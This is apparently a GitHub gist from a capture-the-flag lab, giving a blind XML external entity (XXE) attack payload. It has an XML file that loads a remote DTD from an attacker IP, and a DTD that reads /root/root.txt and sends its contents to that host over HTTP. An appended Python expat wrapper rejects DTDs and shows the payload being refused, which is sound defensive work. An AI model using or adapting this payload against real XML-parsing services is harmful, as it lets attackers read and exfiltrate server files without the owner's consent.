@kavishkagihan
Created July 21, 2022 14:23
Blind XXE attack using a DTD file to read files
  • kavi_creds.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
  <author>&xxe;</author>
</credits>
  • kavi.dtd
<!ENTITY % file SYSTEM "file:///root/root.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.10.14.101/?flag=%file;'>">
%eval;
%exfiltrate;
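
Added example, not part of the original gist: a Python standard-library parser wrapper that refuses the DOCTYPE this technique depends on, so neither the remote `kavi.dtd` fetch nor the `file://` read is ever attempted. The names `ForbiddenXML`, `parse_untrusted`, `is_rejected` and the benign sample document are assumptions made for illustration.

```python
import xml.parsers.expat as expat

class ForbiddenXML(ValueError):
    """Untrusted XML carried a DTD or entity declaration."""

# The gist's kavi_creds.xml, embedded as sample input.
GIST_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
  <author>&xxe;</author>
</credits>"""

# Constructed benign document of the same shape (assumption).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<credits>
  <author>alice</author>
</credits>"""

def _forbid(*_args):
    raise ForbiddenXML("DOCTYPE / entity declarations are not accepted")

def parse_untrusted(xml_bytes):
    """Return {tag: text} for leaf elements; raise ForbiddenXML on any DTD."""
    parser = expat.ParserCreate()
    # Reject at the first sign of a DTD, before any entity is declared or resolved.
    parser.StartDoctypeDeclHandler = _forbid
    parser.EntityDeclHandler = _forbid
    parser.ExternalEntityRefHandler = _forbid
    fields, stack = {}, []

    def on_text(data):
        if stack:
            fields[stack[-1]] = fields.get(stack[-1], "") + data

    parser.StartElementHandler = lambda tag, attrs: stack.append(tag)
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(xml_bytes, True)
    return {k: v.strip() for k, v in fields.items() if v.strip()}

def is_rejected(xml_bytes):
    """True when the document is refused because it contains a DTD."""
    try:
        parse_untrusted(xml_bytes)
    except ForbiddenXML:
        return True
    return False

if __name__ == "__main__":
    print(parse_untrusted(BENIGN))
    print(is_rejected(GIST_PAYLOAD))
```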